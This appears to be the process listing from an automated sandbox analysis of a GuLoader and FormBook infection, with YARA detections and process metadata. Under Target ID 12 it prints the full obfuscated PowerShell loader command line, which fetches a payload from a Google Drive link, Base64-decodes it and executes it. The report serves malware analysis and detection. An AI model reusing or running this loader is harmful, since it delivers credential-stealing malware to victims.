                                                                                                      Imagebase:0x7ff7016f0000
                                                                                                      File size:452'608 bytes
                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000003.00000002.1451665041.000002239FDF9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:4
                                                                                                      Start time:16:11:22
                                                                                                      Start date:10/03/2025
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff62fc20000
                                                                                                      File size:862'208 bytes
                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:5
                                                                                                      Start time:16:11:23
                                                                                                      Start date:10/03/2025
                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                      Imagebase:0x7ff6ca680000
                                                                                                      File size:55'320 bytes
                                                                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:false

                                                                                                      General

                                                                                                      Target ID:12
                                                                                                      Start time:16:11:44
                                                                                                      Start date:10/03/2025
                                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "echo $Unutterability;function Bldagtigeres($Gravic){ .($Semidocumentary) ($Gravic)} function Sinterens($Efemerisk){$Jordspekulationens=4;do{$Velhavers+=$Efemerisk[$Jordspekulationens];$Jordspekulationens+=5;$Relatch=Format-List} until(!$Efemerisk[$Jordspekulationens])$Velhavers}$Feltundersgelses=Sinterens 'D fenTvise .hlT V r. Minw';$Feltundersgelses+=Sinterens 'Ca,sEUnpeBKontcIndeL,iquI ProEBibuNEnact';$forlngerledningen=Sinterens 'SproMabeloNicyz MotiVelol DaclClavaKbyt/';$Eelware=Sinterens 'EjedTStoplEtissMes,1a,di2';$Caplock='Unde[ achntilsESpalTTeak.BrinS PomeU skRManuV S miBo lCPr seEda P b iOSu eIPotaNUdsttclosm TabABe aNForfaRe dgXrayEfootRT.ss]Kata: Cac:Ac.psAan E FicCH lpuIngeRMichIPredTDetryGalaPAtler SproFindTLumbOBaancT.neOAfsplPelm= hel$MetaEHonoE O hlExubwSmaaAaffor,fveE';$forlngerledningen+=Sinterens ' ryo5Pyth. gri0 Ban ul(QuinWCosmiRig nR add.denoDaysw .ocsRead PeroNBroaTAm.n Sem1Ande0Stee.Parm0 Ont; orm KrusWF ntib evn ont6Nupp4Harv;Over HealxDumb6Fed 4outs;rein S,perIniqvBeca:Port1Solo3arri4Brak.Unpe0 F r)Unsm SvanG.llieZooicRep ke plo Pl./Secu2Kata0Audi1Bedd0Dend0 aab1Unus0Min.1Over GrilFhu tiUnderUsureoutefViceostadx.etr/Preo1 Bde3Estl4regn.In d0';$Paabegyndelsers=Sinterens 'Ce tUFabuSTeolE ameRSmaa-RetoAcompg DyseGylln ArkT';$Fibromyxosarcoma=Sinterens 'Tuneh Bl,t P ctCincpChansk nt: Bek/Unco/ UnidEmu.r MatiberavDisue ,fk. SucgDislo TogoPalig MaalBr.wejo,d.WroucFrivoUnjemVedt/Bogsu MelcUdmu?UforeSpejx rsep e,eoluger.strt ivs=BenedPar,oChe w NonnGladlM,sioSp oaUniddBorr&H xai ntedUnmi=Tsum1 ps GIr d7 SweZSa.lLNonqO RanAH bk9 UdbQA coZ NeuG F r5F,si-SandnAcrav Gr AAmebw Haltblaa0 dsabS alW eprXFerl8 B,fi IcoeMaalrGipsl,sop9,linM TimRvan,hTamigTantq';$Stenografere=Sinterens 'Gyn >';$Semidocumentary=Sinterens 'SmreI ConEElskX';$Hypermetamorphotic='Drklokke';$dirigentklokkernes='\Beflingens.Com';Bldagtigeres (Sinterens 'Drif$St mGModpLUntho.ismB StoAPjasLSub :Be eASuprf UndKCru rSla f,rmltUnareRockREmne= gte$Te,eeEmptnjuleV Co :Cat a .plp D,rPSa nD IntA rteTRuffAF nn+Hj d$I dfDFreiIT,otRUnsuI MongArvee mpln AretVe sk onLPugiObipekCarbkha,ve redRCalons ntEUdarS');Bldagtigeres (Sinterens ' Ist$r,paGExchlveneOButcbHe tA HysLHamm:VeteuJordDD safInaulsynge ndutKo tnerg.IBlovnEle.GPublEB.kkrStvlNT,ktESto =Big.$BookfRetsiFluoB InsR PleOFeltMforsY N,nx FacO VmsS Erha.ecirCompCFleto RanmMan a fo .Bit,sOverPMicrLCam.IUngdTDat (Non.$Gld SAlabT CumeInteN AftOEmfagDrejrh.emaChirF Gr Et.ttRT.acESy,u)');Bldagtigeres (Sinterens $Caplock);$Fibromyxosarcoma=$Udfletningerne[0];$Kumiss=(Sinterens ' ice$MbleGUdspLO enONon,B BriASerpLp ym: rbeK VagNCol,UB.ceS YelE sidL S rsHabikUnf eAnisn EmidGasdESvrvsBygn= Ba nbdleE S nWChei- B oO MolbN.alJLumbEUnr.CPapdtUmed F stsSpicyE ots,rget Tr EPalem Spl.Bic.$Cen fEnvieGrosl HaltSkudUTracnStegDUtt,eUnalRPseusSubrg TyneNe rl MaaSHalvEGanos');Bldagtigeres ($Kumiss);Bldagtigeres (Sinterens 'Togg$stemKLangn R nuSll.sparae,artlPocksUr.kkIodoedundn SysdSamteParasA,um.Tre HNgomePelvaFjlldJolle ,trr rys F r[Trum$PillPm.ssaChipaContbHoloe xcog hadyju andykkd RepeTryglUnvis FlueSpatrRappsAnis]Bedr= E t$Dopifsh eoUnberGravlTylvnBevogOvereRe nr kllF rle Defd nfenCl piFremnScapgPre,e Supn');$Aggrades107=Sinterens 'Subc$.ortKIraknId.auBeras voe ootl UunsAdvokSkyde SypnD nidIsole BrosSino.FlerD PeaoMeg wUdgrnRaaklKon o cooa Cagd.porF AnaiScholBathe See(Flet$Fld F Beai Paeb VilrstapoEp tmRepry ocx agoSubpsFi.aaUnderRadicinteoParlmGrueaSil,, ans$Popuo RatpR prsstame .nkn arpdpr.ceoper)';$opsende=$Afkrfter;Bldagtigeres (Sinterens 'U lo$ orsgPropl.apno ParbFlowa K sLNonf:FootoHvniLUnstIFra g ncooH,anS ErhACla c unc KonhOktaa,aciR .nfisemiD .anE erpsGrun=Coll(Bl kTKa tEPaa.S DoutSla -Basip eoa BamTsejlH onp Toph$Spelovarip.onrsAdrtEVindNArtoDSlurePitt)');while (!$Oligosaccharides) {Bldagtigeres (Sinterens 'Rull$EkspgPla lF ldoG ifb St aDeltl ,il: WayS nauF erbG upsChimt Spea.nehnRenotUd oiOmniaCholbCo ylOve eSabb=Pl t$InsaSErytyKon nEl ktGemmaAchrk.ormsChema Vaan allaRebol,nreyEnnesUncoeValgr,oodeBeslr') ;Bldagtigeres $Aggrades107;Bldagtigeres (Sinterens 'P pe[RadiTViskHReciRMe.nE inaAUndedStapIBoksnButyg Sko.,astT SepH VanRGenteGtesASn pDAger] Un,:Mere: P.rSUnisLFormePeriES.isPBegi(Omgr4Zoog0 Red0Fire0Hvir)');Bldagtigeres (Sinterens 'brne$LysgGPe ll MenO.eglbSvinAInv,l Her:UmagoMen l DriIFjerG Brao TenSSar,A HerCSladCb azHFir.aE enR Teai,uffDPaneesrafsPaah=brid( Gr,TStikeN tas entt Mis-ModfPMaddATriftv,gthover Ufor$BlddO Fo,P HeaSmusheDadaNDetadLaseEOd n)') ;Bldagtigeres (Sinterens 'Regu$ G.eGFejllG seO F ibDefoAPr.nlSpon:DevatPolyaPhlegPer,u CerNUndedFodbe ,ndr IcesR,meTPseur LegY UbegTry,nCantIgustn MarGF od=Varm$ MisgArvelneuro.ootb odeaMediL Byc:Wel.U ,utRProtE MandhundEM skLHugoiAparGBrodHNatueGutwdMounECat.R R.b+Tr.k+Pl a%Lave$Opv U RygDUndefFu.gLAv.ceCruiTStubnVeksiKaldnElecgB.sweAutoRsam n hacEHoro.DetecUnegoF ofu Ch NAnict') ;$Fibromyxosarcoma=$Udfletningerne[$Tagunderstrygning]}$Schoolboyhood=362868;$Videresalget=30413;Bldagtigeres (Sinterens 'Pent$RetsG MillSnoooS ntbFlkkaSpytLDec,:.edlu s vfkugerInteiSaavV f aI rrlB azL ohni KorgScu eNona Over=Inte .npoGPetaeNangtBack- HalCDisio verNByggtU faetrann ejtPoly Nigr$.onoOPostP.olisHoveELibrnhypsdVal,e');Bldagtigeres (Sinterens 'Blre$ Hy,g ,unlGingoPh,lb Ra,a Bryl,lut:BesmCtetrhUd riMerckPostePundeDive Text=Me.n Wels[ yseS Squy Syms vertCy.leTr.lm Red.Fa uC DikoNon n UtevScroeK,slrByortPara]Utop:Draa:S loFGuilrSpl,oKonsm Ba,BBra,a Ch s,ulieIm l6Klag4UdlbS Ampt S yr amiOp,inTryggAto (Mose$LiniUEksefSpunrForei SkrvNon iJo klForul ordi langSky eKvat)');Bldagtigeres (Sinterens 'Liq $AktigAfhoLCynoo M,lbFortANe klOver: U psLoweCPurbhbaciIForeL AdvLU,rae orrR KomfabsoeBldelEntrSFara1embo6Quie9Syst Hyg=Dec Du.t[ PrisReciYLibeSNonsTSaltEZoolM fs.fo stInsteOpdaXPre TSoci. D yESkimN DowcTre O onDModuiEmann Hjeg Und] Pru:Ultr:EtolaSoj STranCTofuIcouniPro,.ShaugSupeEHausTNu sSVaniTUnshrBlu,IChorNU poG egi( nke$ RefCFineH ProiO teKkltreMo.oeLang)');Bldagtigeres (Sinterens 'Hjer$ SkugPendlVicao T ubEldiAS halBigo:Me aAExo,GUdskRFor oBergbAut A S rCSleetRaciE.tepRSkrhISquauUn.omKa e=Sarc$ov rST.skc Fo HSonsiFi aLak llMusteSterRUnpofappeeForsLFridsMi h1v,ld6Leni9C ld.ForrSSubpuUpgrbwaggs p etVe orHis II.stNVagtGCl,i(Lyd $BumpsRiftcSkufhS,rmoSnowOSt ml Ro BDiskOIndiym.lih RenOS.raOClicdEstr,Unfe$Overv SulIComadSkrdESgetRSydfeLnnesFrerAVexil JurGSt mE EneTGly )');Bldagtigeres $agrobacterium;"
                                                                                                      Imagebase:0x7e0000
                                                                                                      File size:433'152 bytes
                                                                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 0000000C.00000002.1845297840.0000000008C60000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000C.00000002.1845437156.0000000009FE6000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 0000000C.00000002.1833143849.0000000005D56000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:13
                                                                                                      Start time:16:11:44
                                                                                                      Start date:10/03/2025
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff62fc20000
                                                                                                      File size:862'208 bytes
                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:14
                                                                                                      Start time:16:12:23
                                                                                                      Start date:10/03/2025
                                                                                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                                                                      Imagebase:0x420000
                                                                                                      File size:59'904 bytes
                                                                                                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:15
                                                                                                      Start time:16:12:23
                                                                                                      Start date:10/03/2025
                                                                                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                                                                      Imagebase:0x420000
                                                                                                      File size:59'904 bytes
                                                                                                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:16
                                                                                                      Start time:16:12:23
                                                                                                      Start date:10/03/2025
                                                                                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                                                                      Imagebase:0x420000
                                                                                                      File size:59'904 bytes
                                                                                                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:17
                                                                                                      Start time:16:12:23
                                                                                                      Start date:10/03/2025
                                                                                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                                                                      Imagebase:0x420000
                                                                                                      File size:59'904 bytes
                                                                                                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:18
                                                                                                      Start time:16:12:23
                                                                                                      Start date:10/03/2025
                                                                                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                                                                      Imagebase:0x420000
                                                                                                      File size:59'904 bytes
                                                                                                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:19
                                                                                                      Start time:16:12:23
                                                                                                      Start date:10/03/2025
                                                                                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                                                                      Imagebase:0x420000
                                                                                                      File size:59'904 bytes
                                                                                                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:20
                                                                                                      Start time:16:12:24
                                                                                                      Start date:10/03/2025
                                                                                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                                                                      Imagebase:0x420000
                                                                                                      File size:59'904 bytes
                                                                                                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:21
                                                                                                      Start time:16:12:24
                                                                                                      Start date:10/03/2025
                                                                                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                                                                      Imagebase:0x420000
                                                                                                      File size:59'904 bytes
                                                                                                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:22
                                                                                                      Start time:16:12:24
                                                                                                      Start date:10/03/2025
                                                                                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                                                                      Imagebase:0x420000
                                                                                                      File size:59'904 bytes
                                                                                                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:23
                                                                                                      Start time:16:12:24
                                                                                                      Start date:10/03/2025
                                                                                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                                                                      Imagebase:0x420000
                                                                                                      File size:59'904 bytes
                                                                                                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:24
                                                                                                      Start time:16:12:24
                                                                                                      Start date:10/03/2025
                                                                                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                                                                      Imagebase:0x420000
                                                                                                      File size:59'904 bytes
                                                                                                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:25
                                                                                                      Start time:16:12:24
                                                                                                      Start date:10/03/2025
                                                                                                      Path:C:\Windows\SysWOW64\dxdiag.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
                                                                                                      Imagebase:0x310000
                                                                                                      File size:222'720 bytes
                                                                                                      MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000019.00000002.2181502037.0000000023810000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000019.00000002.2159570047.0000000003DF6000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000019.00000002.2182064496.00000000265D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                      Has exited:true